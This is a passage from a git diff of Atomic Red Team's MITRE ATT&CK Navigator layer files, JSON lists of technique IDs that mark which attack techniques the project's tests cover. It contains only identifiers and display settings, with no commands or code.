echniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 17eb2eaef3..72e91a1e74 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027